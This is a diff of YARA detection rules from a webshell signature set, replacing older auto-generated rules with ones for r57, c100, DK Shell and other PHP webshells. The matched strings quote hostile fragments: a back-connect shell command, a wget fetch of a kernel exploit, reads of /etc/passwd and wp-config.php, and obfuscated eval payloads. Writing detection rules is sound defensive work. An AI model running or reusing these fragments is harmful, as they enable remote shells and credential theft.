 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "2b8aed49f50acd0c1b89a399647e1218f2a8545da96631ac0882da28810eecc4"
+		hash2 = "7a69466dbd18182ce7da5d9d1a9447228dcebd365e0fe855d0e02024f4117549"
+		hash3 = "960feb502f913adff6b322bc9815543e5888bbf9058ba0eb46ceb1773ea67668"
+		hash4 = "07f9ec716fb199e00a90091ffba4c2ee1a328a093a64e610e51ab9dd6d33357a"
+		hash5 = "bbe0f7278041cb3a6338844aa12c3df6b700a12a78b0a58bce3dce14f1c37b96"
+		hash6 = "5ae121f868555fba112ca2b1a9729d4414e795c39d14af9e599ce1f0e4e445d3"
+		hash7 = "ef3a7cd233a880fc61efc3884f127dd8944808babd1203be2400144119b6057f"
+		hash8 = "ba87d26340f799e65c771ccb940081838afe318ecb20ee543f32d32db8533e7f"
 
 	strings:
-		$s0 = "OpenProcess error!"
-		$s1 = "WriteProcessMemory error!"
-		$s4 = "GetProcAddress error!"
-		$s5 = "HHt`HHt\\"
-		$s6 = "Cmaudi0"
-		$s7 = "CreateRemoteThread error!"
-		$s8 = "Kernel32"
-		$s9 = "VirtualAllocEx error!"
+		$s0 = "$blah = ex($p2.\" /tmp/back \".$_POST['backconnectip'].\" \".$_POST['backconnectport'].\" &\");" fullword ascii
+		$s1 = "$_POST['backcconnmsge']=\"</br></br><b><font color=red size=3>Error:</font> Can't backdoor host!</b>\";" fullword ascii
 
 	condition:
-		all of them
+		filesize < 1711KB and 1 of them
 }
-rule SIGNATURE_BASE_Hxdef100_2
+rule SIGNATURE_BASE_Webshell_Backdoor_PHP_Agent_R57_Mod_Bizzz_Shell_R57 : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file hxdef100.exe"
+		description = "Detects Webshell - rule generated from from files Backdoor.PHP.Agent.php, r57.mod-bizzz.shell.txt ..."
 		author = "Florian Roth (Nextron Systems)"
-		id = "1f079b73-29de-50cf-868c-1639a43e576f"
-		date = "2025-03-29"
+		id = "00d3159c-f5d2-5b49-9499-3bb938776858"
+		date = "2016-01-11"
 		modified = "2025-03-29"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8219-L8232"
+		reference = "https://github.com/nikicat/web-malware-collection"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L9374-L9399"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "1b393e2e13b9c57fb501b7cd7ad96b25"
-		logic_hash = "d44131f6c1bfdc36079f474832a79a361dfad96d1b84f7004d682150c93eccc5"
-		score = 75
+		logic_hash = "51660ea25d1b2290c0ca30377dbf378cac8d7b7650603f1dbe5b7914c530d5cf"
+		score = 70
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "e46777e5f1ac1652db3ce72dd0a2475ea515b37a737fffd743126772525a47e6"
+		hash2 = "f51a5c5775d9cca0b137ddb28ff3831f4f394b7af6f6a868797b0df3dcdb01ba"
+		hash3 = "16b6ec4b80f404f4616e44d8c21978dcdad9f52c84d23ba27660ee8e00984ff2"
+		hash4 = "59105e4623433d5bf93b9e17d72a43a40a4d8ac99e4a703f1d8851ad1276cd88"
+		hash5 = "6dc417db9e07420a618d44217932ca8baf3541c08d5e68281e1be10af4280e4a"
+		hash6 = "5d07fdfee2dc6d81da26f05028f79badd10dec066909932129d398627b2f4e94"
+		hash7 = "1db0549066f294f814ec14ba4e9f63d88c4460d68477e5895236173df437d2b8"
+		hash8 = "c6a5148c81411ec9200810619fa5eec6616800a4d76c988431c272bc8679254f"
+		hash9 = "59ea6cf16ea06ff47cf0e6a398df2eaec4d329707b8c3201fc63cbf0b7c85519"
+		hash10 = "0e0227a0001b38fb59fc07749e80c9d298ff0e6aca126ea8f4ea68ebc9a3661f"
+		hash11 = "ef74644065925aa8d64913f5f124fe73d8d289d5f019a104bf5f56689f49ba92"
 
 	strings:
-		$s0 = "\\\\.\\mailslot\\hxdef-rkc000"
-		$s2 = "Shared Components\\On Access Scanner\\BehaviourBlo"
-		$s6 = "SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\"
+		$s1 = "$_POST['cmd'] = which('" ascii
+		$s2 = "$blah = ex(" ascii
 
 	condition:
-		all of them
+		filesize < 600KB and all of them
 }
-rule SIGNATURE_BASE_Release_Dlltest
+rule SIGNATURE_BASE_Webshell_C100 : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file dllTest.dll"
+		description = "Detects Webshell - rule generated from from files c100 v. 777shell"
 		author = "Florian Roth (Nextron Systems)"
-		id = "af821252-8409-5572-9014-59e8c5feaacd"
-		date = "2025-03-29"
+		id = "aa8317ff-680d-5b60-b8a9-a77ea58f0ed0"
+		date = "2016-01-11"
 		modified = "2025-03-29"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8233-L8253"
+		reference = "https://github.com/nikicat/web-malware-collection"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L9401-L9425"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "76a59fc3242a2819307bb9d593bef2e0"
-		logic_hash = "ba759ae1bbde357085b2b2dfda0780b5a239a44b4e999244e8eceed246090ce3"
-		score = 50
+		logic_hash = "cc8c59f70f5ec6c89812b1597e9b864e358593ea5782e359cd483dee1a84b28b"
+		score = 70
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "0202f72b3e8b62e5ebc99164c7d4eb8ec5be6a7527286e9059184aa8321e0092"
+		hash2 = "d4424c61fe29d2ee3d8503f7d65feb48341ac2fc0049119f83074950e41194d5"
+		hash3 = "21dd06ec423f0b49732e4289222864dcc055967922d0fcec901d38a57ed77f06"
+		hash4 = "c377f9316a4c953602879eb8af1fd7cbb0dd35de6bb4747fa911234082c45596"
+		hash5 = "816e699014be9a6d02d5d184eb958c49469d687b7c6fb88e878bca64688a19c9"
+		hash6 = "bbe0f7278041cb3a6338844aa12c3df6b700a12a78b0a58bce3dce14f1c37b96"
+		hash7 = "ef3a7cd233a880fc61efc3884f127dd8944808babd1203be2400144119b6057f"
 
 	strings:
-		$s0 = ";;;Y;`;d;h;l;p;t;x;|;"
-		$s1 = "0 0&00060K0R0X0f0l0q0w0"
-		$s2 = ": :$:(:,:0:4:8:D:`=d="
-		$s3 = "4@5P5T5\\5T7\\7d7l7t7|7"
-		$s4 = "1,121>1C1K1Q1X1^1e1k1s1y1"
-		$s5 = "9 9$9(9,9P9X9\\9`9d9h9l9p9t9x9|9"
-		$s6 = "0)0O0\\0a0o0\"1E1P1q1"
-		$s7 = "<.<I<d<h<l<p<t<x<|<"
-		$s8 = "3&31383>3F3Q3X3`3f3w3|3"
-		$s9 = "8@;D;H;L;P;T;X;\\;a;9=W=z="
+		$s0 = "<OPTION VALUE=\"wget http://ftp.powernet.com.tr/supermail/debug/k3\">Kernel attack (Krad.c) PT1 (If wget installed)" fullword ascii
+		$s1 = "<center>Kernel Info: <form name=\"form1\" method=\"post\" action=\"http://google.com/search\">" fullword ascii
+		$s3 = "cut -d: -f1,2,3 /etc/passwd | grep ::" ascii
+		$s4 = "which wget curl w3m lynx" ascii
+		$s6 = "netstat -atup | grep IST" ascii
 
 	condition:
-		all of them
+		filesize < 685KB and 2 of them
 }
-rule SIGNATURE_BASE_Webadmin
+rule SIGNATURE_BASE_Webshell_Acidpoison : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file webadmin.php"
+		description = "Detects Poison Sh3ll - Webshell"
 		author = "Florian Roth (Nextron Systems)"
-		id = "615d87f8-9094-5994-aea1-d7276623fbca"
-		date = "2025-03-29"
+		id = "6c201221-ca67-57fb-9bc7-fab4fc1da982"
+		date = "2016-01-11"
 		modified = "2025-03-29"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8254-L8265"
+		reference = "https://github.com/nikicat/web-malware-collection"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L9427-L9450"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "3a90de401b30e5b590362ba2dde30937"
-		logic_hash = "6e215c3d8b8357b839416ee6951f7739387bb94aa1284ea7e827ae2205221294"
-		score = 75
+		logic_hash = "31add38bcdc33d5e4b825bfa18ff1a47d5aa5aaeebd8e3adac533c471aa30629"
+		score = 70
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "7a69466dbd18182ce7da5d9d1a9447228dcebd365e0fe855d0e02024f4117549"
+		hash2 = "7a69466dbd18182ce7da5d9d1a9447228dcebd365e0fe855d0e02024f4117549"
+		hash3 = "d0edca7539ef2d30f0b3189b21a779c95b5815c1637829b5594e2601e77cb4dc"
+		hash4 = "d0edca7539ef2d30f0b3189b21a779c95b5815c1637829b5594e2601e77cb4dc"
+		hash5 = "65e7edf10ffb355bed81b7413c77d13d592f63d39e95948cdaea4ea0a376d791"
+		hash6 = "65e7edf10ffb355bed81b7413c77d13d592f63d39e95948cdaea4ea0a376d791"
+		hash7 = "be541cf880a8e389a0767b85f1686443f35b508d1975ee25e1ce3f08fa32cfb5"
+		hash8 = "be541cf880a8e389a0767b85f1686443f35b508d1975ee25e1ce3f08fa32cfb5"
+		hash9 = "ba87d26340f799e65c771ccb940081838afe318ecb20ee543f32d32db8533e7f"
+		hash10 = "ba87d26340f799e65c771ccb940081838afe318ecb20ee543f32d32db8533e7f"
 
 	strings:
-		$s0 = "<input name=\\\"editfilename\\\" type=\\\"text\\\" class=\\\"style1\\\" value='\".$this->inpu"
+		$s1 = "elseif ( enabled(\"exec\") ) { exec($cmd,$o); $output = join(\"\\r\\n\",$o); }" fullword ascii
 
 	condition:
-		all of them
+		filesize < 550KB and all of them
 }
-rule SIGNATURE_BASE_Commands
+rule SIGNATURE_BASE_Webshell_Acid_Fatalisticz_Fx_Fx_P0Ison_Sh3Ll_X0Rg_Byp4Ss_256 : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file commands.asp"
+		description = "Detects Webshell"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7cffefc7-4f24-5908-82a4-f11eda398377"
-		date = "2025-03-29"
+		id = "80f7d202-adb8-5d9c-b176-576e3b9553c1"
+		date = "2016-01-11"
 		modified = "2025-03-29"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8266-L8278"
+		reference = "https://github.com/nikicat/web-malware-collection"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L9452-L9471"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "174486fe844cb388e2ae3494ac2d1ec2"
-		logic_hash = "5251ee090934c8f99a8a2ffef2605593943306937dc56a135a47f1da7e732587"
-		score = 75
+		logic_hash = "07cd255247c9a77b1c9b6049a2b96632252ea9572880b10991c6797c14a05d48"
+		score = 70
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "7a69466dbd18182ce7da5d9d1a9447228dcebd365e0fe855d0e02024f4117549"
+		hash2 = "d0edca7539ef2d30f0b3189b21a779c95b5815c1637829b5594e2601e77cb4dc"
+		hash3 = "65e7edf10ffb355bed81b7413c77d13d592f63d39e95948cdaea4ea0a376d791"
+		hash4 = "ba87d26340f799e65c771ccb940081838afe318ecb20ee543f32d32db8533e7f"
+		hash5 = "1fdf6e142135a34ae1caf1d84adf5e273b253ca46c409b2530ca06d65a55ecbd"
 
 	strings:
-		$s1 = "If CheckRecord(\"SELECT COUNT(ID) FROM VictimDetail WHERE VictimID = \" & VictimID"
-		$s2 = "proxyArr = Array (\"HTTP_X_FORWARDED_FOR\",\"HTTP_VIA\",\"HTTP_CACHE_CONTROL\",\"HTTP_F"
+		$s0 = "<form method=\"POST\"><input type=hidden name=act value=\"ls\">" fullword ascii
+		$s2 = "foreach($quicklaunch2 as $item) {" fullword ascii
 
 	condition:
-		all of them
+		filesize < 882KB and all of them
 }
-rule SIGNATURE_BASE_Hkdoordll
+rule SIGNATURE_BASE_Webshell_Ayyildiz : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file hkdoordll.dll"
+		description = "Detects Webshell"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c4cfb575-89c3-5a72-8bf5-234d4284fe9d"
-		date = "2025-03-29"
+		id = "cc752958-eb6c-5185-b94c-5fcec833924d"
+		date = "2016-01-11"
 		modified = "2025-03-29"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8279-L8290"
+		reference = "https://github.com/nikicat/web-malware-collection"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L9473-L9492"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "b715c009d47686c0e62d0981efce2552"
-		logic_hash = "a3c4d262b59cdf82390c0457810505e9e7a18c9b26ba4524bc368fd2141ec306"
-		score = 75
+		logic_hash = "8441b7d730e337e002eeb7ae8f489e405409ddbe62f45bbc9a74c935d1d9fe66"
+		score = 70
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "0e25aec0a9131e8c7bd7d5004c5c5ffad0e3297f386675bccc07f6ea527dded5"
+		hash2 = "9c43aada0d5429f8c47595f79a7cdd5d4eb2ba5c559fb5da5a518a6c8c7c330a"
+		hash3 = "2ebf3e5f5dde4a27bbd60e15c464e08245a35d15cc370b4be6b011aa7a46eaca"
+		hash4 = "77a63b26f52ba341dd2f5e8bbf5daf05ebbdef6b3f7e81cec44ce97680e820f9"
+		hash5 = "61c4fcb6e788c0dffcf0b672ae42b1676f8a9beaa6ec7453fc59ad821a4a8127"
 
 	strings:
-		$s6 = "Can't uninstall,maybe the backdoor is not installed or,the Password you INPUT is"
+		$s0 = "echo \"<option value=\\\"\". strrev(substr(strstr(strrev($work_dir), \"/\"), 1)) .\"\\\">Parent Directory</option>\\n\";" fullword ascii
+		$s1 = "echo \"<option value=\\\"$work_dir\\\" selected>Current Directory</option>\\n\";" fullword ascii
 
 	condition:
-		all of them
+		filesize < 112KB and all of them
 }
-rule SIGNATURE_BASE_R57Shell_2
+rule SIGNATURE_BASE_Webshell_Zehir : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file r57shell.php"
+		description = "Detects Webshell - rule generated from from files elmaliseker.asp, zehir.asp, zehir.txt, zehir4.asp, zehir4.txt"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d3a3fe11-c9e1-523b-88a3-ddc0c1085d04"
-		date = "2025-03-29"
+		id = "7f8f15a6-1c5b-5c75-b61a-df7b18699f5a"
+		date = "2016-01-11"
 		modified = "2025-03-29"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8291-L8302"
+		reference = "https://github.com/nikicat/web-malware-collection"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L9494-L9513"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "8023394542cddf8aee5dec6072ed02b5"
-		logic_hash = "5319426928d33b62527efb561c2b7a226a5a473735f501b267e6b3b174972085"
-		score = 75
+		logic_hash = "c8fda66ada3581d2471b322ae65032b68c69b882c29f7469dd2ed78800c9c5f7"
+		score = 70
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "16e1e886576d0c70af0f96e3ccedfd2e72b8b7640f817c08a82b95ff5d4b1218"
+		hash2 = "0c5f8a2ed62d10986a2dd39f52886c0900a18c03d6d279207b8de8e2ed14adf6"
+		hash3 = "cb9d5427a83a0fc887e49f07f20849985bd2c3850f272ae1e059a08ac411ff66"
+		hash4 = "b57bf397984545f419045391b56dcaf7b0bed8b6ee331b5c46cee35c92ffa13d"
+		hash5 = "febf37a9e8ba8ece863f506ae32ad398115106cc849a9954cbc0277474cdba5c"
 
 	strings:
-		$s2 = "echo \"<br>\".ws(2).\"HDD Free : <b>\".view_size($free).\"</b> HDD Total : <b>\".view_"
+		$s1 = "for (i=1; i<=frmUpload.max.value; i++) str+='File '+i+': <input type=file name=file'+i+'><br>';" fullword ascii
+		$s2 = "if (frmUpload.max.value<=0) frmUpload.max.value=1;" fullword ascii
 
 	condition:
-		all of them
+		filesize < 200KB and 1 of them
 }
-rule SIGNATURE_BASE_Mithril_V1_45_Dlltest
+rule SIGNATURE_BASE_Uploadshell_98038F1Efa4203432349Badabad76D44337319A6 : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file dllTest.dll"
+		description = "Detects a web shell"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2aea84b6-1b51-58cd-b52b-c31b1f75d295"
-		date = "2025-03-29"
+		id = "f385b091-ce0d-5d5b-8eeb-57e00c8d0210"
+		date = "2016-09-10"
 		modified = "2025-03-29"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8303-L8316"
+		reference = "https://github.com/bartblaze/PHP-backdoors"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L9524-L9539"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "1b9e518aaa62b15079ff6edb412b21e9"
-		logic_hash = "cf1e2ca39ae6b726792bbbaf0f1dd90788a4bb9ba5e3d50c22d75f2b3d4e9e7d"
-		score = 50
+		logic_hash = "68f0de84a387a9af1a32dd8d38c66b002e16e1c954a51e6bc307580180faedbf"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "506a6ab6c49e904b4adc1f969c91e4f1a7dde164be549c6440e766de36c93215"
 
 	strings:
-		$s3 = "syspath"
-		$s4 = "\\Mithril"
-		$s5 = "--list the services in the computer"
+		$s2 = "$lol = file_get_contents(\"../../../../../wp-config.php\");" fullword ascii
+		$s6 = "@unlink(\"./export-check-settings.php\");" fullword ascii
+		$s7 = "$xos = \"Safe-mode:[Safe-mode:\".$hsafemode.\"] " fullword ascii
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x3f3c and filesize < 6KB and ( all of ( $s* ) ) ) or ( all of them )
 }
-rule SIGNATURE_BASE_Dbgiis6Cli
+rule SIGNATURE_BASE_Dkshell_F0772Be3C95802A2D1E7A4A3F5A45Dcdef6997F3 : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file dbgiis6cli.exe"
+		description = "Detects a web shell"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2bc59a6b-f45c-5e68-a346-ac56e8f2757b"
-		date = "2025-03-29"
+		id = "161ceca6-f5e8-5bcf-bc31-2a2169b1a1c7"
+		date = "2016-09-10"
 		modified = "2025-03-29"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8317-L8329"
+		reference = "https://github.com/bartblaze/PHP-backdoors"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L9541-L9555"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "3044dceb632b636563f66fee3aaaf8f3"
-		logic_hash = "f6de3c9b8fbcca230540d1b41659ab02c9548df69f53fa9d5730ac7bb7dfe88a"
+		logic_hash = "81b0a08d1b9d3640e656a5cd08b79c0a2f940a2db5c2d939d19509f993514e86"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "7ea49d5c29f1242f81f2393b514798ff7caccb50d46c60bdfcf61db00043473b"
 
 	strings:
-		$s0 = "User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
-		$s5 = "###command:(NO more than 100 bytes!)"
+		$s1 = "<?php Error_Reporting(0); $s_pass = \"" ascii
+		$s2 = "$s_func=\"cr\".\"eat\".\"e_fun\".\"cti\".\"on" ascii
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x3c0a and filesize < 300KB and all of them )
 }
-rule SIGNATURE_BASE_Remview_2003_04_22
+rule SIGNATURE_BASE_Unknown_8Af033424F9590A15472A23Cc3236E68070B952E : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file remview_2003_04_22.php"
+		description = "Detects a web shell"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3088ee27-42a3-5140-98de-ab6f87c7748b"
-		date = "2025-03-29"
+		id = "fcf467b6-f49a-52d0-a57f-9f3cf6d0b25b"
+		date = "2016-09-10"
 		modified = "2025-03-29"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8330-L8341"
+		reference = "https://github.com/bartblaze/PHP-backdoors"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L9557-L9572"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "17d3e4e39fbca857344a7650f7ea55e3"
-		logic_hash = "2957f6ec7a022ac04759724276f6928625708346903597b0765b5e81207fc6b9"
+		logic_hash = "d7dc9a2a5e0800b5061cb2101d7cda023a6e637f1e7b14054fdb6a0b2cec6084"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "3382b5eaaa9ad651ab4793e807032650667f9d64356676a16ae3e9b02740ccf3"
 
 	strings:
-		$s1 = "\"<b>\".mm(\"Eval PHP code\").\"</b> (\".mm(\"don't type\").\" \\\"&lt;?\\\""
+		$s1 = "$check = $_SERVER['DOCUMENT_ROOT']" fullword ascii
+		$s2 = "$fp=fopen(\"$check\",\"w+\");" fullword ascii
+		$s3 = "fwrite($fp,base64_decode('" ascii
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x6324 and filesize < 6KB and ( all of ( $s* ) ) ) or ( all of them )
 }
-rule SIGNATURE_BASE_FSO_S_Test
+rule SIGNATURE_BASE_Dkshell_4000Bd83451F0D8501A9Dfad60Dce39E55Ae167D : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file test.php"
+		description = "Detects a web shell"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b0cc5a2a-c741-50dd-854f-5a43769e8f47"
-		date = "2025-03-29"
+		id = "804f7229-1440-5a2e-91cd-a58a38b22aa9"
+		date = "2016-09-10"
 		modified = "2025-03-29"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8342-L8354"
+		reference = "https://github.com/bartblaze/PHP-backdoors"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L9574-L9592"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "82cf7b48da8286e644f575b039a99c26"
-		logic_hash = "62613bead716717f116290b1c9eca9aa63eadd280050811e30a54e5d186af2fc"
-		score = 50
+		logic_hash = "26d586e32d1b0b7800b4b61f592dadc3dd0583628e4cd3fa4e24e02067077da5"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "51a16b09520a3e063adf10ff5192015729a5de1add8341a43da5326e626315bd"
 
 	strings:
-		$s0 = "$yazi = \"test\" . \"\\r\\n\";"
-		$s2 = "fwrite ($fp, \"$yazi\");"
+		$x1 = "DK Shell - Took the Best made it Better..!!" fullword ascii
+		$x2 = "preg_replace(\"/.*/e\",\"\\x65\\x76\\x61\\x6C\\x28\\x67\\x7A\\x69\\x6E\\x66\\x6C\\x61\\x74\\x65\\x28\\x62\\x61\\x73\\x65\\x36\\x" ascii
+		$x3 = "echo '<b>Sw Bilgi<br><br>'.php_uname().'<br></b>';" fullword ascii
+		$s1 = "echo '<form action=\"\" method=\"post\" enctype=\"multipart/form-data\" name=\"uploader\" id=\"uploader\">';" fullword ascii
+		$s9 = "$x = $_GET[\"x\"];" fullword ascii
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x3f3c and filesize < 200KB and 1 of ( $x* ) ) or ( 3 of them )
 }
-rule SIGNATURE_BASE_Debug_Cress
+rule SIGNATURE_BASE_Webshell_5786D7D9F4B0Df731D79Ed927Fb5A124195Fc901 : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file cress.exe"
+		description = "Detects a web shell"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6cf3e43c-bec1-5688-b1d7-8ac48d59153a"
-		date = "2025-03-29"
+		id = "7958e5fc-5ac5-58bc-8128-0a778e99a4e4"
+		date = "2016-09-10"
 		modified = "2025-03-29"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8355-L8367"
+		reference = "https://github.com/bartblaze/PHP-backdoors"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L9594-L9608"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "36a416186fe010574c9be68002a7286a"
-		logic_hash = "670e236e72d3cb52ea5dba865749baee58a70f8d100db1dd8eddfe3183339181"
+		logic_hash = "348ccdf997965fbea791d835f1dd4e2c16d37a17ff4195e585fa4226f18faad6"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "b1733cbb0eb3d440c4174cc67ca693ba92308ded5fc1069ed650c3c78b1da4bc"
 
 	strings:
-		$s0 = "\\Mithril "
-		$s4 = "Mithril.exe"
+		$s1 = "preg_replace(\"\\x2F\\x2E\\x2A\\x2F\\x65\",\"\\x65\\x76\\x61\\x6C\\x28\\x67\\x7A\\x69\\x6E\\x66\\x6C\\x61\\x74\\x65\\x28\\x62\\x" ascii
+		$s2 = "input[type=text], input[type=password]{" fullword ascii
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x6c3c and filesize < 80KB and all of them )
 }
-rule SIGNATURE_BASE_Webshell
+rule SIGNATURE_BASE_Webshell_E8Eaf8Da94012E866E51547Cd63Bb996379690Bf : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file webshell.php"
+		description = "Detects a web shell"
 		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2025-03-29"
+		id = "8fda9b9f-9a72-5123-91d7-0d0aec9e17bc"
+		date = "2016-09-10"
 		modified = "2025-03-29"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L8368-L8383"
+		reference = "https://github.com/bartblaze/PHP-backdoors"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L9610-L9625"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "f2f8c02921f29368234bfb4d4622ad19"
-		logic_hash = "e3fdce426d2f6e88d8e9412a3026ea05d027af934763eafe0188602458c2289d"
+		logic_hash = "044491f0b07ef606aa76e70a07d161565f9cecf73e8f9f8db63cacc1c475b056"
 		score = 75
 		quality = 85
-		tags = ""
